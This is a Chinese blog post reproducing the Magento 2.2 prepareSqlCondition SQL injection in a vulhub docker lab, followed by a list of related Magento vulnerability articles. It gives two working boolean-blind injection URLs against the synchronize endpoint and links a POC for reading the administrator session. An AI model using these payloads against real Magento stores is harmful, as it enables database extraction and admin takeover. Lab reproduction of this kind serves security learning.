vulhub漏洞复现38_Magento

最新推荐文章于 2024-03-17 21:37:36 发布
最新推荐文章于 2024-03-17 21:37:36 发布
阅读量615 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44193247/article/details/122833379
版权

安全 mysql php web安全

Magento 2.2 SQL注入漏洞

前言

Magento(麦进斗)是一款新的专业开源电子商务平台,采用php进行开发,使用Zend Framework框架。设计得非常灵活,具有模块化架构体系和丰富的功能。

漏洞详情

其prepareSqlCondition函数存在一处二次格式化字符串的bug,导致引入了非预期的单引号,造成SQL注入漏洞。

环境搭建

靶场:192.168.4.10_ubuntu

执行如下命令启动Magento 2.2.7:

#docker-compose up -d

环境启动后,访问`http://your-ip:8080`,即可看到Magento的安装页面。安装Magento时,数据库地址填写`mysql`,账号密码均为`root`,其他保持默认:

管理员登录(记得登录后面验证用)

漏洞复现

分别访问如下链接:

1.<http://your-ip:8080/catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=%3f&ids[0][product_id][to]=)))+OR+(SELECT+1+UNION+SELECT+2+FROM+DUAL+WHERE+1%3d0)+--+->

2.<http://your-ip:8080/catalog/product_frontend_action/synchronize?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=%3f&ids[0][product_id][to]=)))+OR+(SELECT+1+UNION+SELECT+2+FROM+DUAL+WHERE+1%3d1)+--+->

 可见,在执行`))) OR (SELECT 1 UNION SELECT 2 FROM DUAL WHERE 1=1) -- -`和`))) OR (SELECT 1 UNION SELECT 2 FROM DUAL WHERE 1=0) -- -`时,返回的HTTP状态码不同:

通过改变OR的条件,即可实现SQL BOOL型盲注。

利用[这个POC](https://github.com/ambionics/magento-exploits),可以读取管理员的session:

 

Revenge_scan
关注
Adobe Magento OR Commerce电子商务系统 XXE漏洞复现(CVE-2024-34102)
0xSec
06-28 925
2024年6月,Adobe官方披露CVE-2024-34102 Magento estimate-shipping-methods XXE漏洞,攻击者可在无需登陆的情况下构造恶意请求利用XXE读取文件,或者结合CVE-2024-2961 可能造成远程代码执行。
【风险通告】Adobe Magento 远程代码执行漏洞
爱国小白帽
10-21 616
[金山云安全](javascript:void(0)???? 今天 近日,金山云安全应急响应中心监测到,Adobe官方发布了CVE-2020-24407远程代码执行及CVE-2020-24400: SQL注入漏洞通告。 该漏洞风险等级为高危,请相关用户尽快将Magento Commerce/Open Source升级到最新版本,做好资产自查工作,避免遭受不必要的损失。 漏洞描述 Magento是一套专业开源的电子商务系统。本次Adobe官方发布安全公告披露了的 CVE-2020-24407远程代码执行、CV
外贸网站Magento存在漏洞导致网站被攻击入侵的防护办法
网站安全专家
05-11 642
有些客户在找我们SINESAFE做网站安全服务之前,客户也找过建站的公司去清除后门,建站公司也将系统迁移升级到了最新的2.4.4版本,但后来发现问题并没有完全的解决,还是会反复的被篡改代码和用户的支付页面被劫持跳转,问题的根源是代码里已经被黑客植入后门了,数据库也被留了木马病毒,这个时候不光是要升级magento到最新版本,还得要把木马后门给彻底的清理掉,做好安全加固和防护,才能彻底的解决这个问题。第三,保存服务器的环境,以及现场的各种信息,如端口网络、应用程序、日志文件等。
Magento 2.2 SQL注入漏洞
黑白的博客
12-27 1276
声明 好好学习,天天向上 漏洞描述 Magento(麦进斗)是一款新的专业开源电子商务平台,采用php进行开发,使用Zend Framework框架。设计得非常灵活,具有模块化架构体系和丰富的功能。 其prepareSqlCondition函数存在一处二次格式化字符串的bug,导致引入了非预期的单引号,造成SQL注入漏洞。 影响范围 2.2.* 复现过程 这里使用2.2.7版本 使用vulhub /app/vulhub-master/magento/2.2-sqli 使用docker启动 docker-c
利用Vulnhub复现漏洞 - Magento 2.2 SQL注入漏洞
JiangBuLiu的博客
07-12 2497
Magento 2.2 SQL注入漏洞Vulnhub官方复现教程漏洞原理复现过程启动环境漏洞复现登录管理员账号使用POC读取管理员的session原理理解端口设置浏览器设置BurpSuit设置 Vulnhub官方复现教程 https://vulhub.org/#/environments/magento/2.2-sqli/ 漏洞原理 Magento(麦进斗)是一款新的专业开源电子商务平台,采用ph...
Vulhub靶场
blalaa的博客
09-05 1757
【Django JSONField/HStoreField SQL 注入漏洞 】 ①原理 Django是一款广为流行的开源web框架,由Python编写,许多网站和app都基于Django开发。其支持很多数据库引擎,包括Postgresql、Mysql、Oracle、Sqlite3等,但与Django天生为一对儿的数据库莫过于Postgresql了,Django官方也建议配合Postgresql一起使用。 在Django中支持Postgresql的数据类型:JSONField、HStoreField、Arr
Magento新的ZEND FRAMEWORK安全漏洞
Pedrito666的博客
10-12 310
Magento原厂近日发布了一个与Zend Framework 1和2的Email元件相关的安全漏洞。包括Magento 1.x和Magento 2.x在内的许多PHP解决方案都使用了这个元件。如果您的服务器使用Sendmail作为邮件传输代理的话,这个严重的漏洞可导致恶意的黑客使用远端代码执行攻击。 要保护您的网站免受此漏洞的影响,您应该立即检查邮件发送设定。请到您的Magento商店后台修...
Magento-shoplift-python-exploit:Magento入店行窃漏洞是CheckPoint团队发现的漏洞(http
05-14
Magento-shoplift-python-exploit Magento shoplift漏洞是CheckPoint团队发现的漏洞( )这个由乔伦(Joren)开发的python脚本,但由于存在一些错误,因此它无法正常工作。 如果magento版本易受攻击,则此脚本将使用用户名forme和password forme创建管理员帐户。 --==[[ Greetz To ]]==-- ################################################ ######################################## ,root_devil,google_warrior,INX_r0ot,Darkwolf indishell,Baba,#Silenttoxic India,Magnum sn
Magento_Pusher:Pusher 和 Magento 的快速集成 POC
05-31
Magento_Pusher Pusher 和 Magento 的快速集成 POC 使用此模块确实很容易。 将其复制到您的 Magento 安装中,然后通过管理员转到系统配置 > 高级 > 系统。 找到 Eschrade Pusher 组并输入密钥、身份验证(或应用程序密钥)和应用程序 ID。 确保启用它,然后保存配置。 该模块不与 JavaScript API 集成,它只启用它,因此在您的 HTML 中,您需要放置类似以下代码的内容。 var channel = pusher.subscribe('test_channel'); channel.bind('my_event', function(data) { alert(data.message); }); 要测试它,请使用 Pusher 应用程序页面上提供的 Curl 命令,例如 curl -H 'Content-T
magento2-reindex:这是Magento 2的模块。这允许从Magento 2 Admin重新索引数据
02-15
Magento2 ReIndex数据(Wbs_Reindexer)v1.0.0 Magento 2扩展 该扩展程序有助于从admin重新编制数据索引,而无需执行命令行(CLI)。 特征: 便于使用 来自管理员的简单重新索引数据 快速索引 安装 运行以下命令: composer require webshouters/magento2-reindex bin/magento module:enable Wbs_Reindexer bin/magento setup:upgrade bin/magento cache:flush 用法 安装扩展程序后,登录到您的Magento Admin Panel => System => Tools => Index Management 在此部分中,从操作下拉列表中选择“ ReIndex Data”。 有关Magento 2的更多文章和教程,请访
复现vulhubmagento的2.2-sqli漏洞
最新发布
YX_zjp的博客
03-17 1515
Magento(麦进斗)是一款新的专业开源电子商务平台,采用php进行开发,使用Zend Framework框架。其prepareSqlCondition函数存在一处二次格式化字符串的bug,导致引入了非预期的单引号,造成SQL注入漏洞。3、通过访问your-ip:port可以看到Magento的安装页面。时,返回的HTTP状态码不同,通过改变OR的条件,即可实现SQL BOOL型盲注。/magento-sqli.py以下载poc,poc内容为。4、分别访问链接,再通过burp suite抓包,
magento < 1.9 xss 漏洞修复说明
weixin_33922670的博客
02-16 205
magento XSS漏洞 介绍就不说了 百度一下 到处都是这边简单记录下 处理过程, (比较粗暴,是否有效尚未验证)编辑app/design/adminhtml/default/default/template/sales/order/view/info.phtml文件搜索 getCustomerEmail 有两处 输出调用使用 htmlentities 方...
【高危安全通告】Adobe Magento Open Source远程代码执行漏洞
bocco的博客
02-16 2348
近日,安全狗应急响应中心监测Adobe Magento Open Source被露出远程代码执行漏洞漏洞编号CVE-2022-24086。可导致恶意用户远程代码执行等危害。 为避免您的业务受影响,安全狗建议您及时开展安全自查,如在受影响范围,请您及时进行更新修复,避免被外部攻击者入侵。 漏洞描述 Adobe Magento是美国奥多比(Adobe)公司的一套开源的PHP电子商务系统,该系统提供权限管理、搜索引擎和支付网关等功能,Magento Open Source是Magento的开源版.
利用关键Magento 2漏洞对电子商务站点的持续Xurum攻击
m0_73248913的博客
08-15 124
E-commerce sites using Adobe's Magento 2 software are the target of an ongoing campaign that has been active since at least January 2023.The attacks, dubbed Xurum by Akamai, leverage a now-patched critical security flaw (CVE-2022-24086, CVSS score: 9.8) in
magento2中的工厂模式factory,factories详解
github_31369641的博客
09-04 67
让我们快速了解一个自动生成的工厂,即Magento\Newsletter\Model\SubscriberFactory,然而,有时,如果我们偶然发现意外的结果,运行bin/magento setup:di:compile控制台命令,使用工厂的美妙之处在于,大多数时候,我们甚至不必编写它们,因为它们是由Magento自动生成的,它们的目的是实例化不可注入的类——那些我们不应该直接注入到__construct中的类。工厂是创建其他类的类,很像对象管理器,只是这次我们被鼓励直接使用它们。
源码漏洞思路笔记
weixin_52657559的博客
08-14 1807
源码漏洞思路
Magento Core API详解:资源core_store的方法与实现
Magento Core API 是 Magento 社区版 1.6.1 的核心接口文档,它提供了一系列用于管理 Magento 商店的重要功能。该文档主要关注 "core_store" 资源,这是与 Magento 商店相关的API 功能的核心部分。 1. **方法列表...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值